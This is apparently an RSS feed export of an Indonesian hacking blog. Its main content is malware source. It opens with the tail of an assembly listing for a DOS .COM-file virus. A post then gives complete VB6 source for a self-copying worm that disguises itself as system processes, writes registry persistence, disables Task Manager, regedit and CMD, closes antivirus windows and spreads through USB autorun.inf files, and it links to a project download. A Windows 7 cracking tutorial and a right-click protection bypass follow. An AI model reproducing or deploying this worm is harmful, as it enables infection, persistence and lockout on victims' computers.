mov ah,4fh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Cari file korban lagi&lt;br&gt;
int 21h&lt;br&gt;
jnb open_file&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Apa sudah semua file Com ?,kalau belum jmp ke Open_file&lt;br&gt;
; Kalau sudah semua terinfeksi Exit&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;com_mask: db “*.COM”,0 ; File dengan ekstensi Com&lt;br&gt;
last : int 20h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; Akhir badan virus &lt;em&gt;“V2″&lt;/em&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;virus ends&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;end start&lt;/p&gt;

&lt;hr&gt;&lt;strong&gt;&lt;span style=&quot;font-size: small;&quot;&gt; &lt;/span&gt;&lt;/strong&gt;
&lt;p align=&quot;center&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Listing. 4.4. Rutin Cetak String&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;left&quot;&gt;Pada listing program virus diatas dapat dilihat, modifikasi dari virus 44 byte&lt;br&gt;
Dengan tambahan rutin untuk menampilkan string :&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;
&lt;p align=&quot;justify&quot;&gt;Modification of 44 Virus&lt;br&gt;
© 2000,iwing[indovirus]&lt;br&gt;
-For Educational Only –&lt;/p&gt;
&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;setiap kali penularan. Disini dapat dilihat rutin yang menampilkan pesan tadi yaitu&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-family: Courier New; font-size: x-small;&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p align=&quot;justify&quot;&gt;mulai : mov ah,09 ; Dos service 09h = Cetak String&lt;br&gt;
lea dx,msg ; dx berisi pesan yang akan dicetak&lt;br&gt;
int 21h ; Dos intrupt&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;/p&gt;</description>
            <pubDate>Sun, 21 Aug 2011 02:10:23 +0100</pubDate>
        </item>
        <item>
            <title>Virus For MsWord Etc</title>
            <link>http://barcafireball354.yolasite.com/blog/blog/virus-for-msword-etc-aug-21-2011-2-08-18-am-18</link>
            <description>&lt;p&gt;Program kita kali ini adalah membuat Virus sederhana yaitu hanya 
mengganggu Microsoft Office Word dan Excel.Misalkan user membuka Word 
maka pada kertas tempat mengetik sudah muncul pesan dari Virus demikian 
pula jika membuka Excel maka pesan akan diberikan virus pada cell Excel.
 Sederhana sekali ya..ya memang virus ini tidak merusak 
dokumen/file-file dan tidak mengahpus file-file apapun jadi virus yang 
sangat baik hati..he..he..Jika anda ingin menambahkan fiture-fiture yang
 kejam silahkan saja tapi disini/virus ini tidak saya tuliskan bagaimana
 melakukan format atau delete file ataupun fiture penyusupan lainnya 
(sekarang belum saatnya).Silahkan dicoba dijamin 100% tidak ada data 
yang dihapus, ini hanya sebuah virus permainan saja kok..berani mencoba?&lt;br&gt;
Yang dibutuhkan dalam pembuatan project ini adlah : 5 buah timer dan 1 drivelistbox&lt;br&gt;
Pada proyek kali ini kita dapat belajar mengenai Windows Api 
Sendmessage, registry, dan Otomatisasi pada Word serta Excel. Semoga 
bermanfaat.&lt;/p&gt;
&lt;p&gt;Masukan semua code di bawah ini pada form&lt;br&gt;
==========================================&lt;br&gt;
Private Declare Function FindWindow Lib “user32″ Alias “FindWindowA” 
(ByVal lpClassName As String, ByVal lpWindowName As String) As Long 
‘pencari Kleas dan Window Name Suatu File&lt;br&gt;
Private Declare Function SendMessage Lib “user32″ Alias “SendMessageA” 
(ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As
 Any) As Long ‘sendmessage&lt;br&gt;
Private Declare Function GetDriveType&amp;amp; Lib “Kernel32″ Alias “GetDriveTypeA” (ByVal nDrive As String) ‘ penghandel flashdisk&lt;br&gt;
Private Declare Function ExitWindowsEx Lib “user32″ (ByVal dwOptions As Long, ByVal dwReserved As Long) As Long ‘exit windows&lt;br&gt;
Private Const WM_CLOSE = &amp;amp;H10&lt;br&gt;
Private Const EWX_LOGOFF = 0&lt;br&gt;
Private Const EWX_SHUTDOWN = 1&lt;br&gt;
Private Const EWX_REBOOT = 2&lt;br&gt;
Private Const EWX_FORCE = 4&lt;br&gt;
Private Const EWX_POWEROFF = 8&lt;/p&gt;
&lt;p&gt;Option Explicit&lt;br&gt;
Dim FWnd&lt;br&gt;
Dim obj As Object&lt;br&gt;
Dim doc As Object&lt;br&gt;
Dim WrkBook As Object&lt;br&gt;
Dim WrkSheet As Object&lt;br&gt;
Dim i As Integer&lt;br&gt;
Dim RegRun&lt;br&gt;
Dim FolderStartUp&lt;br&gt;
Dim FolderMyDocuments&lt;br&gt;
Dim FolderTemplates&lt;br&gt;
Dim FolderNetHood&lt;br&gt;
Dim FolderPrintHood&lt;br&gt;
Dim FolderFavorites&lt;br&gt;
Dim FolderSendTo&lt;br&gt;
Dim FolderPrograms&lt;br&gt;
Dim FlashDisk&lt;/p&gt;
&lt;p&gt;Private Sub Form_Load()&lt;br&gt;
On Error Resume Next&lt;br&gt;
‘acak caption virus shg caption akan berubah setiap windows startup atau virus tereksekusi&lt;br&gt;
Randomize&lt;br&gt;
Me.Caption = Int(Rnd * 2221189331445#) ‘silahkan masukan angka sesuka anda&lt;br&gt;
‘menggandakan diri&lt;br&gt;
GandakefolderIstimewa&lt;br&gt;
Me.Visible = False&lt;br&gt;
App.TaskVisible = False ‘virus tidak terlihat di task manager&lt;br&gt;
InfeksiRegistry&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Sub BuatWord()&lt;br&gt;
On Error Resume Next&lt;br&gt;
Set obj = CreateObject(“word.application”)&lt;br&gt;
Set doc = CreateObject(“word.application”)&lt;br&gt;
Set doc = obj.Documents.Add&lt;br&gt;
doc.Content = “VIRUS BERHASIL MENGINFEKSIMU – SALAM KENAL”&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Sub BuatXls()&lt;br&gt;
On Error Resume Next&lt;br&gt;
Set obj = CreateObject(“excel.application”)&lt;br&gt;
Set WrkBook = obj.workbooks.Add&lt;br&gt;
Set WrkSheet = WrkBook.worksheets.Add&lt;br&gt;
WrkSheet.Cells(15, 4) = “VIRUS BERHASIL MENGINFEKSIMU – SALAM KENAL”&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Sub InfeksiRegistry()&lt;br&gt;
On Error Resume Next&lt;br&gt;
RegRun.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows 
NT\CurrentVersion\Winlogon\Shell”, “Explorer.exe” &amp;amp; ” “”&quot; &amp;amp; 
FolderMyDocuments &amp;amp; “\services.exe”&quot;” ‘virus akan tetap berjalan 
pada tipe windows Safe Mode&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell”,
 FolderFavorites &amp;amp; “\SalamKenal.exe” ‘virus akan tetap berjalan pada
 tipe windows Safe Mode With Command Prompt&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”,
 1, “REG_DWORD” ‘Folder Options tdk dapat diakses&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”,
 1, “REG_DWORD” ‘Folder Options tdk dapat diakses&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”,
 0, “REG_DWORD” ‘Sembunyikan file beratribut superhidden/File-file 
system&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”,
 0, “REG_DWORD” ‘Sembunyikan file beratribut superhidden/File-file 
system&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD”,
 1, “REG_DWORD” ‘Disable CMD dan File .Bat&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD”,
 1, “REG_DWORD” ‘Disable CMD dan File .Bat&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools”,
 1, “REG_DWORD” ‘registry tdk dapat diakses dan tdk dapat melakukan 
pengimporan file berekstensi Reg&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools”,
 1, “REG_DWORD” ‘registry tdk dapat diakses dan tdk dapat melakukan 
pengimporan file berekstensi Reg&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon”,
 FolderTemplates &amp;amp; “\smss.exe” ‘smss.exe berjalan pada saat startup&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon”,
 FolderSendTo &amp;amp; “\System.exe” ‘System.exe berjalan pada saat startup&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind”,
 1, “REG_DWORD” ‘search pd star menu hilang&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind”,
 1, “REG_DWORD” ‘Ssearch pd star menu hilang&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoSMHelp”,
 1, “REG_DWORD” ‘help suport pd star menu hilang&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoSMHelp”,
 1, “REG_DWORD” ‘help suport pd star menu hilang&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose”,
 1, “REG_DWORD” ‘Tombol Turn Off pd star menu hilang&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose”,
 1, “REG_DWORD” ‘Tombol Turn Off pd star menu hilang&lt;br&gt;
RegRun.regwrite “HKEY_CURRENT_USER\Control Panel\Colors\WindowText”, “255 0 0″, “REG_SZ” ‘DEFAULT TEKS MENJADI MERAH&lt;br&gt;
RegRun.regwrite “HKEY_CLASSES_ROOT\Drive\shell\Scan With 
Antivirus\Command\”, FolderFavorites &amp;amp; “\SalamKenal.exe” ‘Membuat 
Menu Scan With Antivirus pada klik kanan Drive-drive, tapi bukan 
Antivirus yang dijalankan melainkan Virus SalamKenal.exe yang terletak 
di Folder Favorite&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives”,
 4, “REG_DWORD” ‘Drive C hilang&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives”,
 4, “REG_DWORD” ‘Drive C hilang&lt;br&gt;
RegRun.regwrite 
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileMenu”,
 1, “REG_DWORD” ‘Menu File pada Windows Ekplorer hilang&lt;br&gt;
RegRun.regwrite 
“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileMenu”,
 1, “REG_DWORD” ‘Menu File pada Windows Ekplorer hilang&lt;br&gt;
RegRun.regwrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Autorun”, 1, “REG_DWORD” ‘Autorun pada CD atau USB&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Sub GandaKeFlashDisk()&lt;br&gt;
On Error Resume Next&lt;br&gt;
If Dir(FlashDisk &amp;amp; “\Winlogon.exe”) &amp;lt;&amp;gt; “Winlogon.exe” Then 
‘mengecek ada atau tdknya winlogon.exe di flashdisk jika tdk ada 
kemudian&lt;br&gt;
FileCopy FolderStartUp &amp;amp; “\Winlogon.exe”, FlashDisk &amp;amp; “\Winlogon.exe”&lt;br&gt;
SetAttr FlashDisk &amp;amp; “\Winlogon.exe”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
End If&lt;br&gt;
BuatFileAutorunInf&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Sub BuatFileAutorunInf()&lt;br&gt;
‘membuat file Autorun.inf ke flashdisk yang berfungsi agar setiap 
flashdisk jika di klik dua kali/klik kanan trus klik open maka Virus 
(winlogon.exe) akan tereksekusi&lt;br&gt;
On Error Resume Next&lt;br&gt;
Open FlashDisk &amp;amp; “\Autorun.Inf” For Output As 1&lt;br&gt;
Print #1, “[AutoRun]”&lt;br&gt;
Print #1, “Icon=Winlogon.exe” ‘Agar FlashDisk Memiliki Icon Sama dengan Virus&lt;br&gt;
Print #1, “Open=Winlogon.exe”&lt;br&gt;
Print #1, “ShellExecute=Winlogon.exe”&lt;br&gt;
Print #1, “Shell\Open\Command=Winlogon.exe”&lt;br&gt;
Print #1, “Shell=Open”&lt;br&gt;
Close #1&lt;br&gt;
SetAttr FlashDisk &amp;amp; “\Autorun.Inf”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Sub GandakefolderIstimewa()&lt;br&gt;
On Error Resume Next&lt;br&gt;
Set RegRun = CreateObject(“WScript.Shell”)&lt;br&gt;
FolderStartUp = RegRun.specialfolders(“StartUp”)&lt;br&gt;
FolderMyDocuments = RegRun.specialfolders(“MyDocuments”)&lt;br&gt;
FolderTemplates = RegRun.specialfolders(“Templates”)&lt;br&gt;
FolderNetHood = RegRun.specialfolders(“NetHood”)&lt;br&gt;
FolderPrintHood = RegRun.specialfolders(“PrintHood”)&lt;br&gt;
FolderFavorites = RegRun.specialfolders(“Favorites”)&lt;br&gt;
FolderSendTo = RegRun.specialfolders(“SendTo”)&lt;br&gt;
FolderPrograms = RegRun.specialfolders(“Programs”)&lt;br&gt;
On Error Resume Next&lt;br&gt;
‘membuat virus dengan nama winlogon.exe&lt;br&gt;
FileCopy App.Path &amp;amp; “\” &amp;amp; App.EXEName &amp;amp; “.exe”, FolderStartUp &amp;amp; “\WinLogon.Exe”&lt;br&gt;
SetAttr FolderStartUp &amp;amp; “\Winlogon.exe”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
‘membuat virus dengan nama services.exe&lt;br&gt;
FileCopy App.Path &amp;amp; “\” &amp;amp; App.EXEName &amp;amp; “.exe”, FolderMyDocuments &amp;amp; “\services.Exe”&lt;br&gt;
SetAttr FolderMyDocuments &amp;amp; “\services.exe”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
‘membuat virus dengan nama smss.exe&lt;br&gt;
FileCopy App.Path &amp;amp; “\” &amp;amp; App.EXEName &amp;amp; “.exe”, FolderTemplates &amp;amp; “\smss.Exe”&lt;br&gt;
SetAttr FolderTemplates &amp;amp; “\smss.Exe”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
‘membuat virus dengan nama csrss.exe&lt;br&gt;
FileCopy App.Path &amp;amp; “\” &amp;amp; App.EXEName &amp;amp; “.exe”, FolderPrintHood &amp;amp; “\csrss.Exe”&lt;br&gt;
SetAttr FolderPrintHood &amp;amp; “\csrss.exe”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
‘membuat virus dengan nama Isass.exe&lt;br&gt;
FileCopy App.Path &amp;amp; “\” &amp;amp; App.EXEName &amp;amp; “.exe”, FolderNetHood &amp;amp; “\Isass.Exe”&lt;br&gt;
SetAttr FolderNetHood &amp;amp; “\Isass.exe”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
‘membuat virus dengan nama SalamKenal.exe&lt;br&gt;
FileCopy App.Path &amp;amp; “\” &amp;amp; App.EXEName &amp;amp; “.exe”, FolderFavorites &amp;amp; “\SalamKenal.Exe”&lt;br&gt;
SetAttr FolderFavorites &amp;amp; “\SalamKenal.exe”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
‘membuat virus dengan nama System.exe&lt;br&gt;
FileCopy App.Path &amp;amp; “\” &amp;amp; App.EXEName &amp;amp; “.exe”, FolderSendTo &amp;amp; “\System.Exe”&lt;br&gt;
SetAttr FolderSendTo &amp;amp; “\System.exe”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
‘membuat virus dengan nama ctfmon.exe&lt;br&gt;
FileCopy App.Path &amp;amp; “\” &amp;amp; App.EXEName &amp;amp; “.exe”, FolderPrograms &amp;amp; “\ctfmon.Exe”&lt;br&gt;
SetAttr FolderPrograms &amp;amp; “\ctfmon.exe”, vbHidden + vbSystem + vbReadOnly&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Private Sub Timer1_Timer() ‘Timer 1 diberi interval 5 detik&lt;br&gt;
On Error Resume Next&lt;br&gt;
FWnd = FindWindow(“OpusApp”, “Document1 – Microsoft Word”) ‘Ms Word&lt;br&gt;
If FWnd &amp;lt;&amp;gt; 0 Then&lt;br&gt;
SendMessage FWnd, WM_CLOSE, True, True&lt;br&gt;
BuatWord&lt;br&gt;
obj.Visible = True&lt;br&gt;
Timer2.Enabled = True&lt;br&gt;
Timer1.Enabled = False&lt;br&gt;
End If&lt;br&gt;
On Error Resume Next&lt;br&gt;
FWnd = FindWindow(“OpusApp”, “New Microsoft Word Document.doc – Microsoft Word”) ‘Ms Word&lt;br&gt;
If FWnd &amp;lt;&amp;gt; 0 Then&lt;br&gt;
SendMessage FWnd, WM_CLOSE, True, True&lt;br&gt;
BuatWord&lt;br&gt;
obj.Visible = True&lt;br&gt;
Timer2.Enabled = True&lt;br&gt;
Timer1.Enabled = False&lt;br&gt;
End If&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Private Sub Timer2_Timer()&lt;br&gt;
On Error Resume Next&lt;br&gt;
FWnd = FindWindow(“XLMAIN”, “Microsoft Excel – Book1″) ‘ms excel&lt;br&gt;
If FWnd &amp;lt;&amp;gt; 0 Then&lt;br&gt;
SendMessage FWnd, WM_CLOSE, True, True&lt;br&gt;
BuatXls&lt;br&gt;
obj.Visible = True&lt;br&gt;
Timer1.Enabled = True&lt;br&gt;
Timer2.Enabled = False&lt;br&gt;
End If&lt;br&gt;
On Error Resume Next&lt;br&gt;
FWnd = FindWindow(“XLMAIN”, “Microsoft Excel – New Microsoft Excel Worksheet.xls”) ‘ms excel&lt;br&gt;
If FWnd &amp;lt;&amp;gt; 0 Then&lt;br&gt;
SendMessage FWnd, WM_CLOSE, True, True&lt;br&gt;
BuatXls&lt;br&gt;
obj.Visible = True&lt;br&gt;
Timer1.Enabled = True&lt;br&gt;
Timer2.Enabled = False&lt;br&gt;
End If&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Private Sub Timer3_Timer()&lt;br&gt;
On Error Resume Next&lt;br&gt;
‘menutup aplikasi yang berbahaya bagi virus&lt;br&gt;
FWnd = FindWindow(“#32770″, “RUN”) ‘jendela run&lt;br&gt;
SendMessage FWnd, WM_CLOSE, 0&amp;amp;, 0&amp;amp;&lt;br&gt;
FWnd = FindWindow(“#32770″, “System Configuration Utility”) ‘msconfig&lt;br&gt;
SendMessage FWnd, WM_CLOSE, 0&amp;amp;, 0&amp;amp;&lt;br&gt;
FWnd = FindWindow(“#32770″, “Windows Task Manager”) ‘task manager&lt;br&gt;
SendMessage FWnd, WM_CLOSE, 0&amp;amp;, 0&amp;amp;&lt;br&gt;
FWnd = FindWindow(“#32770″, “Avira AntiVir Personal – Free Antivirus”) ‘Avira Antivir&lt;br&gt;
SendMessage FWnd, WM_CLOSE, 0&amp;amp;, 0&amp;amp;&lt;br&gt;
FWnd = FindWindow(“#32770″, “AntiVir Guard: Attention, Detection!”) ‘Avira Antivir&lt;br&gt;
SendMessage FWnd, WM_CLOSE, 0&amp;amp;, 0&amp;amp;&lt;br&gt;
FWnd = FindWindow(“RegEdit_RegEdit”, vbNullString) ‘regedit.exe&lt;br&gt;
SendMessage FWnd, WM_CLOSE, 0&amp;amp;, 0&amp;amp;&lt;br&gt;
FWnd = FindWindow(“TMainForm”, vbNullString) ‘aplikasi buatan Delphi 
(Antivirus PCMAV yang versi lama dapat ditutup tetapi versi yang baru 
tidak bisa dihentikan) &amp;lt;:d&lt;br&gt;
SendMessage FWnd, WM_CLOSE, 0&amp;amp;, 0&amp;amp;&lt;br&gt;
FWnd = FindWindow(“TApplication”, vbNullString) ‘aplikasi buatan Delphi&lt;br&gt;
SendMessage FWnd, WM_CLOSE, 0&amp;amp;, 0&amp;amp;&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Private Sub Timer4_Timer()&lt;br&gt;
‘cari flashdisk&lt;br&gt;
On Error Resume Next&lt;br&gt;
For i = 0 To Drive1.ListCount – 1&lt;br&gt;
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) &amp;lt;&amp;gt; “a” Then&lt;br&gt;
FlashDisk = (Drive1.List(i))&lt;br&gt;
Timer4.Enabled = False ‘agar lampu flashdisk tdk berkedip-kedip terlalu lama, sehingga tdk mencurigakan si empunya flashdisk&lt;br&gt;
Exit For&lt;br&gt;
End If&lt;br&gt;
Next&lt;br&gt;
GandaKeFlashDisk ‘&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Private Sub Timer5_Timer()&lt;br&gt;
On Error Resume Next&lt;br&gt;
InfeksiRegistry&lt;br&gt;
‘Mungkin salah satu virus dihapus shg perlu selalu menggandakan diri&lt;br&gt;
GandakefolderIstimewa&lt;br&gt;
‘menyalakan timer 4&lt;br&gt;
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) &amp;lt;&amp;gt; “a” Then&lt;br&gt;
Timer4.Enabled = True&lt;br&gt;
End If&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)&lt;br&gt;
Cancel = 1&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Private Sub Form_Unload(Cancel As Integer)&lt;br&gt;
Cancel = 1&lt;br&gt;
End Sub&lt;/p&gt;
&lt;p&gt;Silahkan &lt;a href=&quot;http://www.4shared.com/file/59775133/a79fbd16/VIRUS.html&quot;&gt;Download Project&lt;/a&gt; Di Download/Upload Gratis &lt;a href=&quot;http://www.4shared.com/ref/4563476/1&quot;&gt;Join 4Shared Now!&lt;/a&gt;,
 Tetapi sebelumnya jika anda berkenan berikan rating pada artikel ini 
dengan mengklik tanda bintang di bawah ini, agar saya mengetahui artikel
 yang paling menarik untuk penulisan selanjutnya. Terimakasih.&lt;/p&gt;</description>
            <pubDate>Sun, 21 Aug 2011 02:08:18 +0100</pubDate>
        </item>
        <item>
            <title>Crack Aktifasi Windows 7 All Version</title>
            <link>http://barcafireball354.yolasite.com/blog/blog/crack-aktifasi-windows-7-all-version</link>
            <description>&lt;p&gt;Cara crack aktifasi windows 7 all version tested in windows 7 professional&lt;br&gt;
alo gan ketemu lagi ama saya netron.hehehee&lt;br&gt;
langsung&lt;/p&gt;
&lt;p&gt;sebelumnya gan saya install windows 7 professional 32 bit&lt;br&gt;
setelah saya install dia minta aktifasi 30 hari.hehehe.akal bulus saya jalan dah.kekekeke.saya berpikir ilangin aja aktifasi..&lt;br&gt;
sebelum di crack tampilan computer saya seperti ini gan&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot;&gt;&lt;img class=&quot;aligncenter&quot; src=&quot;http://i1006.photobucket.com/albums/af186/netrondoank/aktifsi283.jpg&quot; alt=&quot;&quot; height=&quot;360&quot; width=&quot;512&quot;&gt;&lt;/p&gt;
&lt;p&gt;lalu tahapnya yaitu crack dengan sofware ini gan&lt;br&gt;
nama nya RemoteWat . Unduh sofwarenya bisa &lt;a href=&quot;http://adf.ly/313683/http://www.indowebster.com/Windows_7_Activation_All_Version.html&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Klik ke TKP&lt;/strong&gt;&lt;/a&gt; bs diliat di screenshot ini&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot;&gt;&lt;img class=&quot;aligncenter&quot; src=&quot;http://i1006.photobucket.com/albums/af186/netrondoank/rat.jpg&quot; alt=&quot;&quot; height=&quot;256&quot; width=&quot;511&quot;&gt;&lt;/p&gt;
&lt;p&gt;lalu klik 2 kali sofware ini tnggu dia kan mengcrack windows 7 anda..setelah selesai dia akan mereboot/merestart komputer anda&lt;br&gt;
setelah itu tampilan my properties anda dari computer akan seperti dibawah ini gan&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot;&gt;&lt;img class=&quot;aligncenter&quot; src=&quot;http://i1006.photobucket.com/albums/af186/netrondoank/setealahdicrack2.jpg&quot; alt=&quot;&quot; height=&quot;331&quot; width=&quot;614&quot;&gt;&lt;br&gt;
hehehe.moga bermanfaat gan…&lt;/p&gt;
&lt;p&gt;By Netron dr forum indonesian technology&lt;br&gt;
Thanks to crashblack , nesta , dhanidhunk , all crew indonesian security @IDT&lt;/p&gt;
&lt;p&gt;http://forum[dot]indotek[dot]or[dot]id&lt;/p&gt;</description>
            <pubDate>Sun, 21 Aug 2011 02:04:10 +0100</pubDate>
        </item>
        <item>
            <title>Mengatasi Proteksi Klik Kanan Pada Website</title>
            <link>http://barcafireball354.yolasite.com/blog/blog/mengatasi-proteksi-klik-kanan-pada-website-aug-21-2011-2-00-38-am-38</link>
            <description>&lt;p style=&quot;text-align: justify;&quot;&gt;Bagi orang yang sering berselancar  di dunia internet, mungkin pernah menemukan &lt;span style=&quot;color: #800080;&quot;&gt;&lt;strong&gt;sebuah
 website yang tidak  diperbolehkan untuk mengklik kanan mouse dengan 
memasang sebuah script dari java script agar isi posting tidak dapat di 
copy dengan klik kanan mouse&lt;/strong&gt;&lt;/span&gt;, memang sungguh sangat  
menjengkelkan, karena terkesan website tersebut terlalu  menjaga agar 
postingnya tidak dapat di copy, sementara &lt;a href=&quot;http://www.binushacker.net/&quot; target=&quot;_blank&quot;&gt;posting&lt;/a&gt; tersebut mungkin dibutuhkan untuk menyelesaikan tugas sekolah.&lt;/p&gt;
&lt;p&gt;Tapi apapun yang mereka lakukan untuk  memprotek posting mereka agar tidak dapat di copy, sebenarnya &lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;percuma&lt;/strong&gt;&lt;/span&gt; dan &lt;span style=&quot;color: #ff0000;&quot;&gt;&lt;strong&gt;sia sia&lt;/strong&gt;&lt;/span&gt; saja. Karena bagaimanapun juga tetap saja posting mereka  dapat di copy dan disimpan di file pengunjung.&lt;/p&gt;
&lt;p&gt;&lt;img class=&quot;aligncenter&quot; title=&quot;Proteksi Klik Kanan&quot; src=&quot;http://www.binushacker.net/wp-content/uploads/klik-kanan.jpg&quot; alt=&quot;&quot; height=&quot;300&quot; width=&quot;415&quot;&gt;&lt;/p&gt;
&lt;p&gt;Ada beberapa cara untuk mengcopy &lt;a href=&quot;http://www.binushacker.net/&quot; target=&quot;_blank&quot;&gt;website&lt;/a&gt; mereka antaralain :&lt;/p&gt;
&lt;ol&gt;&lt;li&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&lt;strong&gt;Dengan menyimpan Website mereka ke file  berbentuk HTML&lt;/strong&gt;&lt;/span&gt;,
 caranya, pada brows klik menu file, Save Page As, maka  website mereka 
dapat tersimpan beserta posting mereka di file komputer  kita dan kita 
dapat membukannya secara off line&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&lt;strong&gt;Dengan menyorot artikel mereka kemudian  menekan tombol Ctrl+C&lt;/strong&gt;&lt;/span&gt;,
 kemudian di pastekan di program Notepad, maka isi  posting mereka sudah
 tercopy ke komputer kita. apalagi bila dipaste di  microsoft word, maka
 seluruh isi posting mereka berikut gambar-gambarnya  dapat kita ambil 
menjadi sebuah file word&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&lt;strong&gt;Dengan cara menggunakan tombol Print Screen&lt;/strong&gt;&lt;/span&gt;,
 kemudian di pastekan dengan menggunakan program adobe Photoshop atau 
Pain brush dan simpan dalam file berbentuk tif kemudian dengan 
menggunakan fasiltas menu Recognize text using OCR, lalu setelah menjadi
 teks gunakan menu Send text to word.&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&lt;strong&gt;Dapat juga dengan cara mendisable atau  menon aktifkan program java script&lt;/strong&gt;&lt;/span&gt;,
